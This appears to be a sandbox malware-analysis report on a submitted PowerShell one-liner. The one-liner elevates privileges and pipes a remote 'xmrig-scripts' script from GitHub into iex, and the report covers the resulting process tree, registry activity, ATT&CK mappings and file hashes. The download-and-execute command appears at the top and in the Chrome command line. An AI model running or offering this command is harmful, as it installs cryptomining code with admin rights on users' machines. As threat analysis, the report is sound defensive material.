hxxp://start-process PowerShell -verb runas irm hxxps://raw[.]githubusercontent[.]com/Lachine1/xmrig-scripts/main/windows[.]ps1 | iex

Analysis

max time kernel
1800s
max time network
1689s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
27/06/2024, 07:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Score

3^/10

defense_evasion privilege_escalation

Malware Config

Signatures

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
2376	chrome.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133639454296941735"	chrome.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2376	chrome.exe
2376	chrome.exe
5640	sdiagnhost.exe
5640	sdiagnhost.exe
5640	sdiagnhost.exe
2376	chrome.exe
2376	chrome.exe
5916	chrome.exe
5916	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe
Token: SeShutdownPrivilege	2376	chrome.exe
Token: SeCreatePagefilePrivilege	2376	chrome.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2652	msdt.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe
2376	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2376 wrote to memory of 1448	2376	chrome.exe	71
PID 2376 wrote to memory of 1448	2376	chrome.exe	71
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4428	2376	chrome.exe	73
PID 2376 wrote to memory of 4092	2376	chrome.exe	74
PID 2376 wrote to memory of 4092	2376	chrome.exe	74
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75
PID 2376 wrote to memory of 1704	2376	chrome.exe	75

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
1⤵
- Access Token Manipulation: Create Process with Token
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff9298f9758,0x7ff9298f9768,0x7ff9298f9778
  2⤵
  PID:1448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=288 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:2
  2⤵
  PID:4428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:8
  2⤵
  PID:4092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2116 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:8
  2⤵
  PID:1704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2652 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:1
  2⤵
  PID:192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2776 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:1
  2⤵
  PID:164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3696 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3892 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:1
  2⤵
  PID:2748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3736 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:8
  2⤵
  PID:3184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3768 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:8
  2⤵
  PID:1612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3784 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:1
  2⤵
  PID:3500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3748 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:1
  2⤵
  PID:1404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3832 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:1
  2⤵
  PID:4852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:8
  2⤵
  PID:4108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4468 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:8
  2⤵
  PID:5044
- C:\Windows\system32\msdt.exe
  -modal "720976" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\Admin\AppData\Local\Temp\NDF4968.tmp" -ep "NetworkDiagnosticsWeb"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:2652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:8
  2⤵
  PID:3096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4328 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:1
  2⤵
  PID:3836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:8
  2⤵
  PID:5348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4132 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:1
  2⤵
  PID:5776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4924 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4060 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:1
  2⤵
  PID:5996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5024 --field-trial-handle=1744,i,1215826951799334114,2712416213953557735,131072 /prefetch:1
  2⤵
  PID:2236

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4980

C:\Windows\System32\sdiagnhost.exe
C:\Windows\System32\sdiagnhost.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
62eb22d1312792fb02b37df0aa7aa5e9

SHA1
a9fa8e009be28fe1f0736c6e699d8c5dd7ff4084

SHA256
aac61bd69d54d97fad728d7bbcd7835ad03fa985a9edfb60705fec1b1474a19f

SHA512
2829adae40c606c45c4606f8e22025833ef08c2dca5b33ade5262ff6a922157918460bc2831f42a24a5e28103f74997ff96e91f61e2dbba3d894b6ed134b0744

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
f34054884b41d92b84ef1c2b5569b261

SHA1
96447777489123c42671efd4ef1a729c9754e158

SHA256
042a59f919a1f9c328be1df49bf58af72f8dda4bccf841791c9f7890390db820

SHA512
037572b9798f965cc5a85ab07277eb4230ad08debc6150f8089e7925e7981f1950b29f1d7de880054221414a4e77dc2a51c9537525378f4c94febd82f0314721

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
167KB

MD5
de985bf1a8a21efa9735e6a5c1036a4d

SHA1
f336718e8275c467daecdcbca008892125a33a67

SHA256
8e24622f14815df2b793f06d4b237101d740e89a8c1ece1629fb01bceb51dbb1

SHA512
3aad9b3eb7aea9c4b8964c6bac63ba7bd4c7a4d989bad5547b6132cc24bf224c9636e3dccc1da5e8686d22bf161adc4c78b7c02c2f779fd7dfa9764dce09530e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
01d9de3677dc714622ca7b367fbbc0ef

SHA1
bc382b1305015ff6fcc78f5a0b0de59d85d25ecd

SHA256
bbef62a8340fd8f97d2f96c6d8c6b3fc3c3358eca524b9028e3f030264504ac1

SHA512
53c25df47ec980759fdbf641252f7ee501524097c3676b2f89d9ef6f3aa099f31fbccd9e63c2b14cffdf73cb5b5fb88d4abe121df0fc2c5bec28bf2e3e72be94

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
3b55302aa33d81b4d1127fc09360b41a

SHA1
46496205d145accaa258527e694c03f844f230be

SHA256
067ce5395ad465cbd92a6b65e645dd3fdd535023557f7881d858d54ce6c5117f

SHA512
de1776d5fd39919f21a6d722d7d7c76214a5a0cdb6ab25def0e8a96d2b5d184ad9d7ce1c8a3d925e4f280ea3bbf239b7132f18b4d18d73796ebc3f19984c1001

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
9ef10d39f5b62e17d7b073151a6cdfc1

SHA1
9b3744a889e601d1422c82ea3b5bea6b8b3b91ef

SHA256
249a4f7d6ffddf510446d19c5cb915c462faba96cfcaf63a555ca12fc70074e0

SHA512
f2722364ad7195c067ea8896e505e327aafa4ca7d55ae456112797c74b48795b15b285c2446948b25e6ff67d5ec0dbd15461083ccf62d04fb0eececfa2363cf0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
94KB

MD5
bf3d0256c0c67d4d86f7fcb4fa1e4a34

SHA1
9bf0e785aafc7c0782583196318ebd050ce24c56

SHA256
d9f1f054629e21ed2e0c8ca6e55169d8f61cddcba07a12bda7c1cfdfd9f2283e

SHA512
82f43d9d8bc01c5ad07546a73f820f99376751399435f9a249a081c594976d98a25acf9fe76ef24226891ca7bb2f7e653a50bd5d84edd4dffdc801d78ef825ba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
92KB

MD5
079f38709140491963fadbe86eaa6151

SHA1
b31bffd08662341ca0c2a980e90d22bdf5c2bf85

SHA256
9936206635d03b7ade7fc196f42e7ea12fc9c303c7620a5de2424be3eacf3dd0

SHA512
bcbd58d5cb4fcee97dcbe00956bc6ea98d52617c4ad7f27279493d307fb7e06a3dabc18f67765848d9d97d854be3a9111e03252e01ac836756122a3049c0e2b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58721e.TMP

Filesize
91KB

MD5
11fc9c904883dd5d17dc330e497d1f8d

SHA1
c69480abe6714d3f4bfe379f3a21e80ed343e7b5

SHA256
602913d807f2925fe9f068fa893843540cf7b4e58ee6a31ed211bd2759fcddb6

SHA512
267a3bfc7045ffa82a7665bfe0b5535ba1acc9764477e6459e8f86166c0b24920369720a0cf61fbca727f5288834c71bfb889bf459993dbf211465f4205dff20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\NDF4968.tmp

Filesize
3KB

MD5
528834f04620c5b79e87051fcd9de18b

SHA1
e6e1be2339fc1ea22ad2774431ce829e046d7084

SHA256
31b7df114bc72a277e2aeae281fc7908bb176ab0787c66d8e5537a83acbe6466

SHA512
078bd33291378e66385b4b2ea524cf8ab548ced118cf580f2276d19693b3ed5456429516fffc293b58ec4993583dbc50c93e195e18b34f8dcf832c5dbf33fa38

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hlo0cax5.oxa.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Windows\TEMP\SDIAG_816ad726-d4f7-45f9-9b72-d8bd42c852ed\NetworkDiagnosticsTroubleshoot.ps1

Filesize
23KB

MD5
d18dd3c5d111eecbfec65251d357f3c1

SHA1
5cec3df9e5f7fe3ea0d7226e1461da2de2fad900

SHA256
fc9ce9f57cb224d13ea1b973fa084e8f7fd00dd172d84b7c14e31085c58fea5d

SHA512
6ce2eac565c0fc921f07881c2bb64ba73c670562a8b86456d718c1a75ab6097f623d49a608aa984075d1d764dcdca9b1cd95704f6bf817e7b1081b7b5ae0a7ce

Download Submit
C:\Windows\TEMP\SDIAG_816ad726-d4f7-45f9-9b72-d8bd42c852ed\UtilityFunctions.ps1

Filesize
53KB

MD5
c912faa190464ce7dec867464c35a8dc

SHA1
d1c6482dad37720db6bdc594c4757914d1b1dd70

SHA256
3891846307aa9e83bca66b13198455af72af45bf721a2fbd41840d47e2a91201

SHA512
5c34352d36459fd8fcda5b459a2e48601a033af31d802a90ed82c443a5a346b9480880d30c64db7ad0e4a8c35b98c98f69eceedad72f2a70d9c6cca74dce826a

Download Submit
C:\Windows\TEMP\SDIAG_816ad726-d4f7-45f9-9b72-d8bd42c852ed\UtilitySetConstants.ps1

Filesize
2KB

MD5
0c75ae5e75c3e181d13768909c8240ba

SHA1
288403fc4bedaacebccf4f74d3073f082ef70eb9

SHA256
de5c231c645d3ae1e13694284997721509f5de64ee5c96c966cdfda9e294db3f

SHA512
8fc944515f41a837c61a6c4e5181ca273607a89e48fbf86cf8eb8db837aed095aa04fc3043029c3b5cb3710d59abfd86f086ac198200f634bfb1a5dd0823406b

Download Submit
C:\Windows\TEMP\SDIAG_816ad726-d4f7-45f9-9b72-d8bd42c852ed\en-US\LocalizationData.psd1

Filesize
5KB

MD5
91e3038ec5ddc6a0924607b192117a68

SHA1
af46db32086ddd72fbf759ed136f7e66ad5b5b43

SHA256
7e23e58cc90aa265464cb2f5a9da9f2a04ba2541e84ab26a052cc17155a91080

SHA512
fc745c310d0157df2f588dc4f9b991c484712f7935b6e4128e02433c2a2b9cda2daf959af006f63c55a5a9a4e0c8e4caaa4c86d7a65a626d55822097dcb7fd84

Download Submit
C:\Windows\Temp\SDIAG_816ad726-d4f7-45f9-9b72-d8bd42c852ed\DiagPackage.dll

